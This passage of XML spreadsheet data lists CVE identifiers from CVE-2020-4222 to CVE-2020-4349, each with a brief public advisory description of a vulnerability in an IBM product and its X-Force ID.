    <t>The IBM Spectrum Scale 4.2 and 5.0 file system component is affected by a denial of service security vulnerability. An attacker can force the Spectrum Scale mmfsd/mmsdrserv daemons to unexpectedly exit, impacting the functionality of the Spectrum Scale cluster and the availability of file systems managed by Spectrum Scale. IBM X-Force ID: 175067.</t>
  </si>
  <si>
    <t>CVE-2020-4222</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175091.</t>
  </si>
  <si>
    <t>CVE-2020-4223</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.0.10 and 7.6.1.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 175121.</t>
  </si>
  <si>
    <t>CVE-2020-4224</t>
  </si>
  <si>
    <t>IBM StoredIQ 7.6.0.17 through 7.6.0.20 could disclose sensitive information to a local user due to data in certain directories not being encrypted when it contained symbolic links. IBM X-Force ID: 175133.</t>
  </si>
  <si>
    <t>CVE-2020-4226</t>
  </si>
  <si>
    <t>IBM MobileFirst Platform Foundation 8.0.0.0 stores highly sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 175207.</t>
  </si>
  <si>
    <t>CVE-2020-4229</t>
  </si>
  <si>
    <t>IBM Worklight/MobileFoundation 8.0.0.0 does not properly invalidate session cookies when a user logs out of a session, which could allow another user to gain unauthorized access to a user's session. IBM X-Force ID: 175211.</t>
  </si>
  <si>
    <t>CVE-2020-4230</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.1 and 11.5 is vulnerable to an escalation of privilege when an authenticated local attacker with special permissions executes specially crafted Db2 commands. IBM X-Force ID: 175212.</t>
  </si>
  <si>
    <t>CVE-2020-4231</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow an authenticated user to perform unauthorized commands due to hazardous input validation. IBM X-Force ID: 175335.</t>
  </si>
  <si>
    <t>CVE-2020-4232</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow an attacker to enumerate usernames to find valid login credentials which could be used to attempt further attacks against the system. IBM X-Force ID: 175336.</t>
  </si>
  <si>
    <t>CVE-2020-4233</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow a remote attacker to obtain sensitive information, caused by the failure to set the secure flag for the session cookie in SSL mode. By intercepting its transmission within an HTTP session, an attacker could exploit this vulnerability to capture the cookie and obtain sensitive information. IBM X-Force ID: 175360.</t>
  </si>
  <si>
    <t>CVE-2020-4235</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.17 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 175408.</t>
  </si>
  <si>
    <t>CVE-2020-4236</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.17 could allow an authenticated user to cause a denial of service due to improper content parsing in the project management module. IBM X-Force ID: 175409.</t>
  </si>
  <si>
    <t>CVE-2020-4237</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.17 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 175410.</t>
  </si>
  <si>
    <t>CVE-2020-4238</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.17 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 175411.</t>
  </si>
  <si>
    <t>CVE-2020-4239</t>
  </si>
  <si>
    <t>IBM Tivoli Netcool Impact 7.1.0.0 through 7.1.0.17 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 175412.</t>
  </si>
  <si>
    <t>CVE-2020-4240</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request to overwrite or create arbitrary files on the system. IBM X-Force ID: 175417.</t>
  </si>
  <si>
    <t>CVE-2020-4241</t>
  </si>
  <si>
    <t>IBM Spectrum Scale and IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 175418.</t>
  </si>
  <si>
    <t>CVE-2020-4242</t>
  </si>
  <si>
    <t>IBM Spectrum Scale and IBM Spectrum Protect Plus 10.1.0 through 10.1.5 could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 175419.</t>
  </si>
  <si>
    <t>CVE-2020-4243</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 Virtual Appliance could allow a remote attacker to obtain sensitive information using man in the middle techniques due to not properly invalidating session tokens. IBM X-Force ID: 175420.</t>
  </si>
  <si>
    <t>CVE-2020-4244</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow an unauthorized user to obtain sensitive information through user enumeration. IBM X-Force ID: 175422.</t>
  </si>
  <si>
    <t>CVE-2020-4245</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 175423.</t>
  </si>
  <si>
    <t>CVE-2020-4246</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 175481.</t>
  </si>
  <si>
    <t>CVE-2020-4248</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 175484.</t>
  </si>
  <si>
    <t>CVE-2020-4249</t>
  </si>
  <si>
    <t>IBM Security Identity Governance and Intelligence 5.2.6 could disclose highly sensitive information to other authenticated users on the sytem due to incorrect authorization. IBM X-Force ID: 175485.</t>
  </si>
  <si>
    <t>CVE-2020-4251</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.8 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 175489.</t>
  </si>
  <si>
    <t>CVE-2020-4252</t>
  </si>
  <si>
    <t>IBM DOORS Next Generation (DNG/RRC) 6.0.2. 6.0.6, and 6.0.61 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 175490.</t>
  </si>
  <si>
    <t>CVE-2020-4253</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0CD does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 175559.</t>
  </si>
  <si>
    <t>CVE-2020-4254</t>
  </si>
  <si>
    <t>IBM Security Guardium Big Data Intelligence 1.0 (SonarG) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 175560.</t>
  </si>
  <si>
    <t>CVE-2020-4257</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175635.</t>
  </si>
  <si>
    <t>CVE-2020-4258</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175637.</t>
  </si>
  <si>
    <t>CVE-2020-4259</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 could allow an authenticated user could manipulate cookie information and remove or add modules from the cookie to access functionality not authorized to. IBM X-Force ID: 175638.</t>
  </si>
  <si>
    <t>CVE-2020-4260</t>
  </si>
  <si>
    <t>IBM UrbanCode Deploy (UCD) 7.0.5 could allow a user with special permissions to obtain sensitive information via generic processes. IBM X-Force ID: 175639.</t>
  </si>
  <si>
    <t>CVE-2020-4261</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175644.</t>
  </si>
  <si>
    <t>CVE-2020-4262</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175645.</t>
  </si>
  <si>
    <t>CVE-2020-4263</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175646.</t>
  </si>
  <si>
    <t>CVE-2020-4264</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175647.</t>
  </si>
  <si>
    <t>CVE-2020-4265</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175648.</t>
  </si>
  <si>
    <t>CVE-2020-4266</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175649.</t>
  </si>
  <si>
    <t>CVE-2020-4267</t>
  </si>
  <si>
    <t>IBM MQ and MQ Appliance 8.0, 9.1 LTS, and 9.1 CD could allow an authenticated user cause a denial of service due to a memory leak. IBM X-Force ID: 175840.</t>
  </si>
  <si>
    <t>CVE-2020-4268</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-ForceID: 175841.</t>
  </si>
  <si>
    <t>CVE-2020-4269</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-ForceID: 175845.</t>
  </si>
  <si>
    <t>CVE-2020-4270</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 could allow a local user to gain escalated privileges due to weak file permissions. IBM X-ForceID: 175846.</t>
  </si>
  <si>
    <t>CVE-2020-4271</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 could allow an authenticated user to send a specially crafted command which would be executed as a lower privileged user. IBM X-ForceID: 175897.</t>
  </si>
  <si>
    <t>CVE-2020-4272</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 could allow a remote attacker to include arbitrary files. A remote attacker could send a specially-crafted request specify a malicious file from a remote system, which could allow the attacker to execute arbitrary code on the vulnerable server. IBM X-ForceID: 175898.</t>
  </si>
  <si>
    <t>CVE-2020-4273</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 4.2 and 5.0 could allow a local unprivileged attacker with intimate knowledge of the enviornment to execute commands as root using specially crafted input. IBM X-Force ID: 175977.</t>
  </si>
  <si>
    <t>CVE-2020-4274</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 could allow an authenticated user to access data and perform unauthorized actions due to inadequate permission checks. IBM X-ForceID: 175980.</t>
  </si>
  <si>
    <t>CVE-2020-4276</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional is vulnerable to a privilege escalation vulnerability when using token-based authentication in an admin request over the SOAP connector. X-Force ID: 175984.</t>
  </si>
  <si>
    <t>CVE-2020-4277</t>
  </si>
  <si>
    <t>IBM TRIRIGA Application Platform 3.5.3 and 3.6.1 discloses sensitive information in error messages that could aid an attacker formulate future attacks. IBM X-Force ID: 175993.</t>
  </si>
  <si>
    <t>CVE-2020-4278</t>
  </si>
  <si>
    <t>IBM Platform LSF 9.1 and 10.1, IBM Spectrum LSF Suite 10.2, and IBM Spectrum Suite for HPA 10.2 could allow a local user to escalate their privileges due to weak file permissions when specific debug settings are enabled in a Linux or Unix enviornment. IBM X-Force ID: 176137.</t>
  </si>
  <si>
    <t>CVE-2020-4280</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3 and 7.4 could allow a remote attacker to execute arbitrary commands on the system, caused by insecure deserialization of user-supplied content by the Java deserialization function. By sending a malicious serialized Java object, an attacker could exploit this vulnerability to execute arbitrary commands on the system. IBM X-Force ID: 176140.</t>
  </si>
  <si>
    <t>CVE-2020-4281</t>
  </si>
  <si>
    <t>IBM DOORS Next Generation (DNG/RRC) 6.0.2, 6.0.6, 6.0.6.1, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176141.</t>
  </si>
  <si>
    <t>CVE-2020-4282</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, and 1.0.5 could allow an authenticated user to perform unauthorized actions by bypassing illegal character restrictions. X-Force ID: 176205.</t>
  </si>
  <si>
    <t>CVE-2020-4283</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, and 1.0.4 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 176206.</t>
  </si>
  <si>
    <t>CVE-2020-4284</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, and 1.0.5 could disclose sensitive information to an unauthorized user due to insufficient timeout functionality in the Web UI. IBM X-Force ID: 176207.</t>
  </si>
  <si>
    <t>CVE-2020-4285</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176266</t>
  </si>
  <si>
    <t>CVE-2020-4286</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 176268.</t>
  </si>
  <si>
    <t>CVE-2020-4287</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176269.</t>
  </si>
  <si>
    <t>CVE-2020-4288</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176270.</t>
  </si>
  <si>
    <t>CVE-2020-4289</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, and 1.0.5 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 176332.</t>
  </si>
  <si>
    <t>CVE-2020-4290</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, and 1.0.5 could allow any authenticated user to spoof the configuration owner of any other user which disclose sensitive information or allow for unauthorized access. IBM X-Force ID: 176333.</t>
  </si>
  <si>
    <t>CVE-2020-4291</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, and 1.0.5 could disclose sensitive information to an unauthorized user due to insufficient timeout functionality in the Web UI. IBM X-Force ID: 176334.</t>
  </si>
  <si>
    <t>CVE-2020-4292</t>
  </si>
  <si>
    <t>IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, 1.0.2, 1.0.3, and 1.0.4 uses a cross-domain policy file that includes domains that should not be trusted which could disclose sensitive information. IBM X-Force ID: 176335.</t>
  </si>
  <si>
    <t>CVE-2020-4294</t>
  </si>
  <si>
    <t>IBM QRadar 7.3.0 to 7.3.3 Patch 2 is vulnerable to Server Side Request Forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-ForceID: 176404.</t>
  </si>
  <si>
    <t>CVE-2020-4295</t>
  </si>
  <si>
    <t>IBM DOORS Next Generation (DNG/RRC) 6.0.2, 6.0.6, 6.0.6.1, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176408.</t>
  </si>
  <si>
    <t>CVE-2020-4297</t>
  </si>
  <si>
    <t>IBM DOORS Next Generation (DNG/RRC) 6.0.2, 6.0.6, 6.0.6.1, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176474.</t>
  </si>
  <si>
    <t>CVE-2020-4298</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176475.</t>
  </si>
  <si>
    <t>CVE-2020-4299</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 could expose sensitive information to a user through a specially crafted HTTP request. IBM X-Force ID: 176606.</t>
  </si>
  <si>
    <t>CVE-2020-4300</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.0 and 11.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 176607.</t>
  </si>
  <si>
    <t>CVE-2020-4301</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 176609.</t>
  </si>
  <si>
    <t>CVE-2020-4302</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.0 and 11.1 could allow a remote attacker to execute arbitrary code on the system, caused by a CSV injection. By persuading a victim to open a specially-crafted excel file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 176610.</t>
  </si>
  <si>
    <t>CVE-2020-4303</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server - Liberty 17.0.0.3 through 20.0.0.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176668.</t>
  </si>
  <si>
    <t>CVE-2020-4304</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server - Liberty 17.0.0.3 through 20.0.0.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176670.</t>
  </si>
  <si>
    <t>CVE-2020-4305</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.3, 11.5, and 11.7 could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data. By persuading a victim to visit a specially crafted Web site, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 176677.</t>
  </si>
  <si>
    <t>CVE-2020-4306</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0.0 through 2.0.9 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176735.</t>
  </si>
  <si>
    <t>CVE-2020-4307</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.1 could allow an attacker on the same network to gain access to the Solr dashboard and cause a denial of service attack. IBM X-Force ID: 176997.</t>
  </si>
  <si>
    <t>CVE-2020-4309</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0CD could disclose sensitive information to an unauthenticated user which could be used to aid in further attacks against the system. IBM X-Force ID: 177080.</t>
  </si>
  <si>
    <t>CVE-2020-4310</t>
  </si>
  <si>
    <t>IBM MQ and MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 C are vulnerable to a denial of service attack due to an error within the Data Conversion logic. IBM X-Force ID: 177081.</t>
  </si>
  <si>
    <t>CVE-2020-4311</t>
  </si>
  <si>
    <t>IBM Tivoli Monitoring 6.3.0 could allow a local attacker to execute arbitrary code on the system. By placing a specially crafted file, an attacker could exploit this vulnerability to load other DLL files located in the same directory and execute arbitrary code on the system. IBM X-Force ID: 177083.</t>
  </si>
  <si>
    <t>CVE-2020-4312</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 trough 6.0.3.1 could allow an authenticated user to obtain sensitive information from a cached web page. IBM X-Force ID: 177089.</t>
  </si>
  <si>
    <t>CVE-2020-4315</t>
  </si>
  <si>
    <t>IBM Business Automation Content Analyzer on Cloud 1.0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77234.</t>
  </si>
  <si>
    <t>CVE-2020-4316</t>
  </si>
  <si>
    <t>IBM Publishing Engine 6.0.6, 6.0.6.1, and 7.0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77354.</t>
  </si>
  <si>
    <t>CVE-2020-4317</t>
  </si>
  <si>
    <t>IBM Intelligent Operations Center for Emergency Management, Intelligent Operations Center (IOC), and IBM Water Operations for Waternamics are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 177355.</t>
  </si>
  <si>
    <t>CVE-2020-4318</t>
  </si>
  <si>
    <t>IBM Intelligent Operations Center for Emergency Management, Intelligent Operations Center (IOC), and IBM Water Operations for Waternamics are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 177356.</t>
  </si>
  <si>
    <t>CVE-2020-4319</t>
  </si>
  <si>
    <t>IBM MQ, IBM MQ Appliance, and IBM MQ for HPE NonStop 8.0, 9.1 LTS, and 9.1 CD could allow under special circumstances, an authenticated user to obtain sensitive information due to a data leak from an error message within the pre-v7 pubsub logic. IBM X-Force ID: 177402.</t>
  </si>
  <si>
    <t>CVE-2020-4320</t>
  </si>
  <si>
    <t>IBM MQ Appliance and IBM MQ AMQP Channels 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD do not correctly block or allow clients based on the certificate distinguished name SSLPEER setting. IBM X-Force ID: 177403.</t>
  </si>
  <si>
    <t>CVE-2020-4322</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.7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77511.</t>
  </si>
  <si>
    <t>CVE-2020-4323</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 177514.</t>
  </si>
  <si>
    <t>CVE-2020-4324</t>
  </si>
  <si>
    <t>IBM Security Secret Server proir to 10.9 could allow a remote attacker to bypass security restrictions, caused by improper input validation. IBM X-Force ID: 177515.</t>
  </si>
  <si>
    <t>CVE-2020-4325</t>
  </si>
  <si>
    <t>The IBM Process Federation Server 18.0.0.1, 18.0.0.2, 19.0.0.1, 19.0.0.2, and 19.0.0.3 Global Teams REST API does not properly shutdown the thread pools that it creates to retrieve Global Teams information from the federated systems. As a consequence, the Java Virtual Machine can't recover the memory used by those thread pools, which leads to an OutOfMemory exception when the Process Federation Server Global Teams REST API is used extensively. IBM X-Force ID: 177596.</t>
  </si>
  <si>
    <t>CVE-2020-4327</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 177599.</t>
  </si>
  <si>
    <t>CVE-2020-4328</t>
  </si>
  <si>
    <t>IBM Financial Transaction Manager 3.2.4 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 177839.</t>
  </si>
  <si>
    <t>CVE-2020-4329</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0 and Liberty 17.0.0.3 through 20.0.0.4 could allow a remote, authenticated attacker to obtain sensitive information, caused by improper parameter checking. This could be exploited to conduct spoofing attacks. IBM X-Force ID: 177841.</t>
  </si>
  <si>
    <t>CVE-2020-4336</t>
  </si>
  <si>
    <t>IBM WebSphere eXtreme Scale 8.6.1 stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 177932.</t>
  </si>
  <si>
    <t>CVE-2020-4337</t>
  </si>
  <si>
    <t>IBM API Connect 2018.4.1.0 through 2018.4.1.12 could allow an attacker to launch phishing attacks by tricking the server to generate user registration emails that contain malicious URLs. IBM X-Force ID: 177933.</t>
  </si>
  <si>
    <t>CVE-2020-4338</t>
  </si>
  <si>
    <t>IBM MQ 9.1.4 could allow a local attacker to obtain sensitive information by inclusion of sensitive data within runmqras data. IBM X-Force ID: 177937.</t>
  </si>
  <si>
    <t>CVE-2020-4340</t>
  </si>
  <si>
    <t>IBM Security Secret Server prior to 10.9 could allow an attacker to bypass SSL security due to improper certificate validation. IBM X-Force ID: 178180.</t>
  </si>
  <si>
    <t>CVE-2020-4341</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 178181.</t>
  </si>
  <si>
    <t>CVE-2020-4342</t>
  </si>
  <si>
    <t>IBM Security Secret Server 10.7 could disclose sensitive information included in installation files to an unauthorized user. IBM X-Force ID: 178182.</t>
  </si>
  <si>
    <t>CVE-2020-4343</t>
  </si>
  <si>
    <t>IBM i2 Intelligent Analyis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 178244.</t>
  </si>
  <si>
    <t>CVE-2020-4344</t>
  </si>
  <si>
    <t>IBM Tivoli Business Service Manager 6.2.0.0 - 6.2.0.2 IF 1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 178247.</t>
  </si>
  <si>
    <t>CVE-2020-4345</t>
  </si>
  <si>
    <t>IBM i 7.2, 7.3, and 7.4 users running complex SQL statements under a specific set of circumstances may allow a local user to obtain sensitive information that they should not have access to. IBM X-Force ID: 178318.</t>
  </si>
  <si>
    <t>CVE-2020-4346</t>
  </si>
  <si>
    <t>IBM API Connect's V2018.4.1.0 through 2018.4.1.10 management server has an unsecured api which can be exploited by an unauthenticated attacker to obtain sensitive information. IBM X-Force ID: 178322.</t>
  </si>
  <si>
    <t>CVE-2020-4347</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.3, 11.5, and 11.7 could be subject to attacks based on privilege escalation due to inappropriate file permissions for files used by WebSphere Application Server Network Deployment. IBM X-Force ID: 178412.</t>
  </si>
  <si>
    <t>CVE-2020-4348</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.4 could allow an authenticated GUI user to perform unauthorized actions due to missing function level access control. IBM X-Force ID: 178414</t>
  </si>
  <si>
    <t>CVE-2020-4349</t>
  </si>
  <si>
